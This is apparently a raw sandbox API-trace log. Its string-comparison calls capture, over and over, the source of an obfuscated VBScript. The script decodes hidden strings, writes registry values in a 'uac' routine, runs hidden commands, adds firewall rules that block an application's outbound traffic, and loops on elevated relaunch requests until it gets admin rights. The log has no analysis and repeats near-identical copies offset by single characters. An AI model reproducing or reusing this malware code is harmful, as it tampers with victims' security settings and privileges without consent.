newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.022] wcsncmp (_String1="= bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0223.022] wcsncmp (_String1=" bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.022] wcsncmp (_String1="bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0223.022] wcsncmp (_String1="mw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.022] wcsncmp (_String1="w(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 